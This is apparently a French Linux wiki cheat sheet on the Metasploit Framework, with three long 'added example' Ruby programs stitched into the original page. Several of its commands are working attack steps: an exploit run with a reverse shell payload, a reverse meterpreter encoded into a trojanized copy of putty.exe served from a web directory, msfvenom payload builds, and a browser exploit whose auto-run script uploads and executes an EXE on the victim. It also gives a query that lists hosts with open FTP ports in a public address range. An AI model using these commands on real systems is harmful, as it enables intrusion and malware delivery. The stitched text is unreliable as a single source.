Metasploit

From Linuxmemo.


Version of 11 May 2013 at 06:52

(see meterpreter)

Installation

apt-get install ruby libopenssl-ruby libyaml-ruby libdl-ruby libiconv-ruby libreadline-ruby irb ri rubygems
apt-get install git
apt-get install build-essential ruby-dev libpcap-dev
apt-get install rubygems libmysqlclient-dev

MySQL support:

apt-get install mysql-server
apt-get install rubygems libmysqlclient-dev
gem install mysql
apt-get install msgpack-python

git:

git clone https://github.com/rapid7/metasploit-framework.git metasploit

gem:

apt-get install libxslt-dev libxml2-dev
gem install bundler
In the directory containing the Gemfile:
bundler install

shell

help, info, set, show and use.

show exploits
search 
use windows/http/savant_31_overflow
show options
set RHOST 192.168.1.5
show targets
set TARGET 0
show payloads
set PAYLOAD windows/shell/reverse_nonx_tcp
show options
exploit

show options Displays the list of options and their current values (those specified with the set command)

show exploits Displays the list of exploits

show targets Displays the list of targets

show payloads Displays the list of available payloads

show advanced Displays the advanced options

search

Keywords:

 edb       :  Modules with a matching Exploit-DB ID
 bid       :  Modules with a matching Bugtraq ID
 cve       :  Modules with a matching CVE ID
 author    :  Modules written by this author
 port      :  Modules with a matching remote port
 path      :  Modules with a matching path or reference name
 type      :  Modules of a specific type (exploit, auxiliary, or post)
 platform  :  Modules affecting this platform
 name      :  Modules with a matching descriptive name
 osvdb     :  Modules with a matching OSVDB ID
 app       :  Modules that are client or server attacks

Examples:

 search cve:2009 type:exploit app:client
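To make the keyword syntax above concrete, here is an added example (not code from Linuxmemo or from the Metasploit project) that parses a search query of the form shown and applies it, with the same AND semantics msfconsole uses, to a small set of constructed module records. The module metadata, author names and reference IDs (the XXXX/YYYYY parts) are placeholders invented for the example, not the framework's real entries.

```ruby
# Added example: parser and matcher for the msfconsole "search" keyword syntax,
# run over constructed module metadata.
SEARCH_KEYWORDS = %w[edb bid cve author port path type platform name osvdb app].freeze

# Constructed stand-in for the module database. Reference IDs are placeholders
# (XXXX / YYYYY), not real CVE, OSVDB or EDB numbers.
SAMPLE_MODULES = [
  { path: 'exploit/windows/browser/adobe_geticon', type: 'exploit', app: 'client',
    platform: 'windows', port: 80, name: 'Adobe getIcon browser overflow (constructed entry)',
    authors: ['author one'], refs: ['CVE-2009-XXXX', 'OSVDB-XXXXX'] },
  { path: 'exploit/windows/http/savant_31_overflow', type: 'exploit', app: 'server',
    platform: 'windows', port: 80, name: 'Savant 3.1 web server overflow (constructed entry)',
    authors: ['author two'], refs: ['CVE-2002-XXXX'] },
  { path: 'exploit/windows/misc/doubletake', type: 'exploit', app: 'server',
    platform: 'windows', port: 1234, name: 'DoubleTake service overflow (constructed entry)',
    authors: ['author one', 'author three'], refs: ['OSVDB-YYYYY'] },
  { path: 'auxiliary/scanner/ftp/ftp_version', type: 'auxiliary', app: 'server',
    platform: 'multi', port: 21, name: 'FTP version scanner (constructed entry)',
    authors: ['author two'], refs: [] }
].freeze

# Split a query into [keyword, value] pairs. A bare word (no known keyword in
# front of it) becomes a 'text' term matched against the module name and path.
def parse_search_query(query)
  query.split.map do |tok|
    key, value = tok.split(':', 2)
    if value && SEARCH_KEYWORDS.include?(key.downcase)
      [key.downcase, value.downcase]
    else
      ['text', tok.downcase]
    end
  end
end

# Does one module satisfy one search term?
def term_matches?(mod, key, value)
  case key
  when 'cve', 'bid', 'edb', 'osvdb'
    # References are stored as "<SOURCE>-<id>"; the id part is matched loosely,
    # so "cve:2009" finds every CVE reference from that year.
    mod[:refs].any? { |r| r.downcase.start_with?("#{key}-") && r.downcase.include?(value) }
  when 'type', 'app', 'platform' then mod[key.to_sym].downcase == value
  when 'port' then mod[:port].to_s == value
  when 'author' then mod[:authors].any? { |a| a.downcase.include?(value) }
  when 'name' then mod[:name].downcase.include?(value)
  when 'path' then mod[:path].downcase.include?(value)
  else mod[:name].downcase.include?(value) || mod[:path].downcase.include?(value)
  end
end

# Every term must match (AND, as in msfconsole). Returns the matching module paths.
def search_modules(query, modules = SAMPLE_MODULES)
  terms = parse_search_query(query)
  modules.select { |m| terms.all? { |k, v| term_matches?(m, k, v) } }.map { |m| m[:path] }
end

if __FILE__ == $PROGRAM_NAME
  # The example query from the page.
  puts search_modules('cve:2009 type:exploit app:client')
end
```

The keyword list is the one documented above; anything else in the query falls through to a free-text match, which is why a bare `savant` still finds the Savant module.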

Binaries

http://www.offensive-security.com/metasploit-unleashed/Main_Page

  • msfbinscan (quick tool to determine whether a binary is vulnerable to a given flaw)
./msfbinscan -i [DLL] |grep -P "^Size "
  • msfcli (Client mode script)
./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=9030 LHOST=192.168.0.10 E
  • msfconsole (Console)
  • msfd (daemon: utility that exposes the Metasploit framework for remote access)
  • msfelfscan (development tool)
  • msfencode (disguises a payload inside a file, changing its MD5 hash)
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=443 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -x /var/www/putty.exe -o /var/www/puttyx.exe
  • msfgui (graphical interface)
  • msfmachscan (development tool)
  • msfpayload (injects a payload into a file (exe, doc, ...))
./msfpayload -l
./msfpayload windows/shell_bind_tcp O
./msfpayload windows/shell_bind_tcp EXITFUNC=seh LPORT=1234 C
  • msfpescan (development tool: determines the pop/pop/ret return type at a given address)
./msfpescan -D -a 0x767a38f6 win2000sp4.umpnpmgr.dll
  • msfrop (development tool: Return Oriented Programming (ROP) against Windows "Data Execution Prevention" (DEP), searching for "gadgets")
./msfrop -v metsrv.dll 
  • msfrpc (RPC client)
./msfrpc -S -U msf -P msf -a 127.0.0.1
  • msfrpcd (RPC daemon)
./msfrpcd -U msf -P msf -f -S -a 127.0.0.1
  • msfupdate (automatic online update)
./msfupdate
  • msfvenom (combines msfpayload and msfencode into a single command)
msfvenom -p <PAYLOAD> -e <ENCODER> -f <FORMAT DE SORTIE> > nomdefichier
./msfvenom --help-formats
Executable formats
dll, exe, exe-small, elf, macho, vba, vba-exe, vbs, loop-vbs, asp, aspx, war, psh, psh-net
Transform formats
raw, ruby, rb, perl, pl, bash, sh, c, js_be, js_le, java
./msfvenom -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -i 3
./msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/jmp_call_additive LHOST=<NOTRE IP> | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -f exe > meter.exe

Module tree

Auxiliary Version 3.0 supports the concept of auxiliary modules, which can be used to perform arbitrary actions such as port scanning or denial of service, among others. (Unlike exploit modules, auxiliary modules do not have a payload.)

Encoder

Exploit "Exploit" modules are the core modules in Metasploit.

Nop NOP modules provide "no-operation" instructions used when exploiting buffer overflows.

Payload Payloads are portions of code (shellcode) executed when the exploit succeeds. Payloads provide the communication between Metasploit and the victim.

Adding an exploit

Look at the exploit's class in its code.

class Exploits::Windows::Misc::Doubletake

Recreate the corresponding directory tree under .msf4 in your home directory.

cd ~/.msf4
mkdir -p modules/exploits/windows/misc
cp resp_ou_est_expoit/doubletake.rb modules/exploits/windows/misc/

Before:

+ -- --=[ 302 exploits - 124 payloads

After:

+ -- --=[ 303 exploits - 124 payloads.

You can now use the new exploit.

Tips

  • automatic db_connect:
vim database.yml

production:
  adapter: postgresql
  database: msf
  username: msf
  password: 
  host: 127.0.0.1
  port: 5432
  pool: 75
  timeout: 5
# sudo must apply to the write into /etc/profile, not only to echo (with "sudo echo ... >> /etc/profile" the redirection runs as the unprivileged user and fails)
echo 'export MSF_DATABASE_CONFIG=/usr/local/share/metasploit-framework/database.yml' | sudo tee -a /etc/profile
  • resource file

1. Create a command file "monfichier.rc"

2. Load the command file with "resource"

msf > resource monfichier.rc
[*] Processing monfichier.rc for ERB directives.
resource (karma.rc)> db_connect msf3:PASSWORD@127.0.0.1:7175/msf3
  • meterpreter behind 2 NAT routers:
  • downloaded data is stored in ~/.msf4/<module_name>
  • command history is in ~/.msf4/history
  • problem with pcaprub, which is very often not compiled on the system:
cd /opt/framework3/msf3/external/pcaprub
ruby extconf.rb
make
make install
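The database.yml in the automatic db_connect tip above is what MSF_DATABASE_CONFIG points every msfconsole at, and it carries the database credentials in clear text (in the page's copy the password field is empty). The following is an added example, not code from Linuxmemo or from Metasploit, that audits such a file with Ruby's standard YAML library: it flags an empty password, a database host that is not loopback, and a file mode that lets other users read the credentials. The YAML is a constructed copy of the page's configuration, and the file_mode parameter is an assumption of the example (you would pass `File.stat(path).mode & 0o777` for a real file).

```ruby
require 'yaml'

# Constructed copy of the database.yml shown on the page; the empty password is
# kept deliberately so the audit has something to report.
SAMPLE_DATABASE_YML = <<~YAML
  production:
    adapter: postgresql
    database: msf
    username: msf
    password:
    host: 127.0.0.1
    port: 5432
    pool: 75
    timeout: 5
YAML

LOOPBACK_HOSTS = %w[127.0.0.1 localhost ::1].freeze

# Audit every environment block of a database.yml. Returns an array of finding
# strings; an empty array means nothing was flagged. file_mode is the octal
# permission of the file (assumed parameter; 0600 is the safe default).
def audit_database_config(yaml_text, file_mode: 0o600)
  findings = []
  config = YAML.safe_load(yaml_text) || {}

  config.each do |env, db|
    next unless db.is_a?(Hash)

    # "password:" with nothing after it parses as nil; a blank string is as bad.
    pw = db['password']
    findings << "#{env}: empty database password" if pw.nil? || pw.to_s.strip.empty?

    # The framework's database should only ever be reached over loopback.
    host = db['host'].to_s
    findings << "#{env}: database host #{host} is not loopback" unless LOOPBACK_HOSTS.include?(host)
  end

  # Any group/other bit set means another local user can read the credentials.
  if (file_mode & 0o077) != 0
    findings << format('file mode %04o is readable by group or others', file_mode)
  end
  findings
end

if __FILE__ == $PROGRAM_NAME
  audit_database_config(SAMPLE_DATABASE_YML, file_mode: 0o644).each { |f| puts "[!] #{f}" }
end
```

Run against the page's own configuration with a typical 0644 file mode, the audit reports both the empty password and the world-readable file; with a password set and the file chmod 600, it returns nothing.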

Recipes

Postgres DB joins

SELECT 
hosts.address, hosts.name, hosts.os_name, services.proto, services.port, services.name, services.state, services.info
FROM hosts, services 
WHERE hosts.id = services.host_id AND services.state = 'open' AND services.port = '21'

or

SELECT 
hosts.address, hosts.name, hosts.os_name, services.proto, services.port, services.name, services.state, services.info
FROM hosts INNER JOIN services 
ON hosts.id = services.host_id AND services.state = 'open' AND services.port = '21'

or

SELECT 
hosts.address, hosts.name, hosts.os_name, services.proto, services.port, services.name, services.state, services.info
FROM hosts INNER JOIN services 
ON hosts.id = services.host_id 
WHERE services.state = 'open' 
AND services.port = '21'
AND hosts.address >= '41.158.0.0' 
AND hosts.address <= '41.159.0.0'
ORDER BY hosts.address

See: Sql

Automation

  • Resource Scripts Files

Resource script files can be specified with the -r option to the Metasploit Console, and ~/.msf4/msfconsole.rc is automatically executed on startup if it exists. Resource scripts can also be executed from the console prompt through the resource command. Resource scripts were originally limited to simple console commands; Ruby code can now be inserted directly into them.

  • Plugins

Plugins add new console commands that provide a utility or automation function.

  • Auxiliary Module Custom Commands

An auxiliary module doesn't take an actual payload the way an exploit does. Auxiliary modules handle things like reconnaissance, authentication bypass, network sniffing, and vulnerability discovery.

  • Custom Auxiliary Modules
  • Metasploit Remote API

The Metasploit Framework and Metasploit Pro both support automation using a documented Remote API.
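The Remote API mentioned here is what the msfrpc and msfrpcd commands in the Binaries section speak: each call is an HTTP POST whose body is a MessagePack array of [method, *args], with the session token returned by auth.login placed right after the method name on every later call. The following is an added example, not code from Linuxmemo or from the Metasploit project, that implements just enough MessagePack to build an auth.login request and decode the reply. The replies are constructed here rather than captured from a server, and the token value is a placeholder; the request path, content type and message shapes are the documented protocol.

```ruby
# Added example: wire format of the msfrpcd Remote API (MessagePack over HTTP).
# Only the msgpack types the auth.login exchange needs are implemented.
module MiniMsgpack
  def self.pack(obj)
    case obj
    when nil   then [0xC0].pack('C')
    when false then [0xC2].pack('C')
    when true  then [0xC3].pack('C')
    when String
      s = obj.b
      if s.bytesize < 32 then [0xA0 | s.bytesize].pack('C') + s       # fixstr
      elsif s.bytesize < 256 then [0xD9, s.bytesize].pack('CC') + s   # str 8
      else raise ArgumentError, 'string longer than this example supports'
      end
    when Array
      raise ArgumentError, 'array longer than 15 elements' if obj.size > 15
      obj.map { |e| pack(e) }.inject([0x90 | obj.size].pack('C'), :+)                  # fixarray
    when Hash
      raise ArgumentError, 'map longer than 15 entries' if obj.size > 15
      obj.map { |k, v| pack(k.to_s) + pack(v) }.inject([0x80 | obj.size].pack('C'), :+) # fixmap
    else
      raise ArgumentError, "unsupported type #{obj.class}"
    end
  end

  def self.unpack(bytes)
    obj, pos = read(bytes.b, 0)
    raise ArgumentError, 'trailing bytes after object' if pos != bytes.bytesize
    obj
  end

  # Decode one object starting at pos; returns [object, position after it].
  def self.read(buf, pos)
    tag = buf.getbyte(pos)
    raise ArgumentError, 'truncated input' if tag.nil?
    pos += 1
    case tag
    when 0xC0 then [nil, pos]
    when 0xC2 then [false, pos]
    when 0xC3 then [true, pos]
    when 0xA0..0xBF then read_str(buf, pos, tag & 0x1F)
    when 0xD9
      len = buf.getbyte(pos)
      raise ArgumentError, 'truncated input' if len.nil?
      read_str(buf, pos + 1, len)
    when 0x90..0x9F
      arr = []
      (tag & 0x0F).times { v, pos = read(buf, pos); arr << v }
      [arr, pos]
    when 0x80..0x8F
      h = {}
      (tag & 0x0F).times { k, pos = read(buf, pos); v, pos = read(buf, pos); h[k] = v }
      [h, pos]
    else
      raise ArgumentError, format('msgpack tag 0x%02x not handled in this example', tag)
    end
  end

  def self.read_str(buf, pos, len)
    raise ArgumentError, 'truncated string' if pos + len > buf.bytesize
    [buf.byteslice(pos, len).force_encoding('UTF-8'), pos + len]
  end
end

# Request framing used by msfrpcd: POST to this path with this content type.
MSF_RPC_PATH = '/api/'.freeze
MSF_RPC_CONTENT_TYPE = 'binary/message-pack'.freeze

# auth.login is the only call made without a token: [method, user, pass].
def build_login_request(user, pass)
  MiniMsgpack.pack(['auth.login', user, pass])
end

# Every other call carries the session token after the method name.
def build_authed_request(method, token, *args)
  MiniMsgpack.pack([method, token, *args])
end

# Decode an auth.login reply; returns the token, or nil on anything but success.
def extract_token(reply_bytes)
  reply = MiniMsgpack.unpack(reply_bytes)
  return nil unless reply.is_a?(Hash) && reply['result'] == 'success'
  reply['token']
end

# Constructed replies (not captured from a real server): a success map with
# "result" and "token", and a failure map carrying "error". The token is a placeholder.
SAMPLE_LOGIN_OK   = MiniMsgpack.pack('result' => 'success', 'token' => 'TEMPconstructedtoken0001')
SAMPLE_LOGIN_FAIL = MiniMsgpack.pack('error' => true, 'error_message' => 'invalid credentials (constructed)')

if __FILE__ == $PROGRAM_NAME
  puts build_login_request('msf', 'msf').unpack1('H*')   # hex dump of the request body
  puts extract_token(SAMPLE_LOGIN_OK)
end
```

The token that comes back is what authorises every later call, so the transport matters as much as the credentials: in the msfrpcd and msfrpc commands listed under Binaries, -S disables SSL on the RPC socket, which is why those examples also bind to 127.0.0.1 with -a; the same daemon reachable on a network interface would expose the password and the session token in clear.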

  • Ruby Programming

The APIs offered make it easy to embed a copy of the framework into another tool, parse the module database looking for a specific set of criteria, or even repurpose the existing network APIs to build something new.

  • Automatic script on a meterpreter session

firstly I understand from your post that you know how to get a meterpreter session from the victim already... so what you should do is write a meterpreter script in ruby and configure the meterpreter session handler to execute the script automatically (using set AutoRunScript) on establishment of session from victim. That way you won't have to wait in front of the console for the session. See example below:

   use exploit/windows/browser/adobe_geticon
   set srvhost x.x.x.x
   set srvport 80
   set uripath /
   set payload windows/meterpreter/reverse_tcp
   set lhost x.x.x.x      (if msf server and meterpreter handler is run on same machine then keep it same as srvhost)
   set lport 4444      (default option)
   set AutoRunScript yourScript     (yourScript.rb is a ruby script in the /opt/metasploit/msf3/scripts/meterpreter dir and does getsystem, migrate, etc at victim end)
   exploit -j -z

when the victim visits the server link http://x.x.x.x/ he will open a meterpreter session and the script will auto upload and execute the custom EXE file on victim machine. Also if you need help with writing the meterpreter script just
(a) google around
(b) check the existing scripts in /opt/metasploit/msf3/scripts/meterpreter directory of your installation
(c) or write back here for help

Development-Environment

https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment
